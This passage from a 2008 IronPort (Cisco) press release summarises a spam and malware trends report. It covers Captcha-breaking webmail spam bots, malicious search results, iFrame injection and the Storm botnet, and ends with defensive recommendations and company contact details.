-- Webmail spam. Sophisticated bots are operating in conjunction with automated and manual Captcha-breaking processes to create large numbers of free webmail accounts. ("Captcha" stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. A common Captcha test requires someone to type a series of distorted letters and numbers to ensure that the response is not computer-generated.) After the accounts are created, the bots send out spam using these accounts, and the spam recipient observes the messages as originating from a legitimate ISP's mail servers, not from the botnet. These "theft of reputation" attacks accounted for more than 5 percent of all spam in the first quarter of 2008, up from less than 1 percent the previous quarter. -- Google exploitation. Next-generation malware is using Google's "I'm feeling lucky" search option to channel traffic to infected sites. An estimated 1.3 percent of all Google searches return malware sites as valid results. Given the tremendous volume of searches carried out every minute, this translates into a potentially huge opportunity for malware distributors. -- iFrame Injections. This is a redirection that happens when a user visits a website that has malicious code embedded, like JavaScript. These websites can appear to be well-known, "legitimate" websites or specifically created botsites that rank high in search engine results. The JavaScript tells the browsers to grab a file from another web server hosting the actual malicious Trojan, often through an embedded iFrame. The Trojan then installs in the background without the users knowledge. Once installed the Trojan can do a number of things like stealing passwords or system data.The botnets examined in the report are unique in that they tied spam campaigns to current events or websites of interest, using a blend of email and the web to propagate. Additionally, these decentralized and highly coordinated attacks enabled a variety of Internet assaults, from email and blog spam to phishing, instant messaging (IM) attacks and distributed denial-of-service (DDoS) attacks. Storm malware was the first of this trend of sophisticated social engineering, affecting a cumulative 40 million computers around the world between January 2007 and February 2008, according to IronPort researchers. At its peak in July 2007, Storm accounted for more than 20 percent of all spam messages and had infected and was active in 1.4 million computers simultaneously. It continued to infect or reinfect about 900,000 computers per month. By September 2007, the number of simultaneous active computers generating Storm messages was reduced to 280,000 a day, and the total number of spam messages accounted for 4 percent of all spam. Storm currently represents only a tiny sliver of the more than 161 billion spam messages sent every day, yet variants of Storm are still active. In addition to assessing the damage from such social-engineering-based attacks, the report details trends that portend the future of spam and viruses and the measures that businesses should take to ensure that their networks are protected. No longer is spam just an irritation created by individuals seeking glory. Today it has morphed into organized, technically savvy, well-funded malware efforts that are comparable in scale to the business operations of legitimate software vendors. To increase efficiency and profitability, malware creators are even beginning to offer their products as complete solutions, including technical support, analytics and administration tools, and software updates. Among the recent botnet malware discoveries are Bobax, Kraken/Kracken and Srizbi. To prevent the spread of botnets such as Storm and its successors, IronPort's report recommends that every business employ spam filtering, assess its web reputation, monitor port and communications activity, and keep all antivirus and antimalware products updated. The full update can be found online at http://www.ironport.com/trends. About IronPort Systems IronPort Systems, now part of Cisco, is headquartered in San Bruno, Calif. IronPort is the leading provider of antispam, antivirus and antispyware appliances for organizations ranging from small businesses to the Global 2000. IronPort appliances utilize SenderBase®, the world's largest email and web threat-detection network and database. IronPort products are innovative and easy-to-use, providing breakthrough performance and playing a mission-critical role in a company's network infrastructure. To learn more about IronPort products and services, please visit: http://www.ironport.com/. Copyright © 2008 Cisco Systems, Inc. All rights reserved. IronPort, the IronPort logo and SenderBase are registered trademarks of Cisco Systems, Inc. All other trademarks are the property of Cisco Systems, Inc. or their respective owners. While every effort is made to ensure the information given is accurate, Cisco does not accept liability for any errors or mistakes which may arise. Specifications and other information in this document may be subject to change without notice. For direct RSS Feeds of all Cisco news, please visit "News@Cisco" at the following link: http://newsroom.cisco.com/dlls/rss.html
Contact Information: Press / Analysts If you are a reporter or analyst and want more information on IronPort Systems please contact: David Oro IronPort Systems 707.558.8585 oro@ironport.com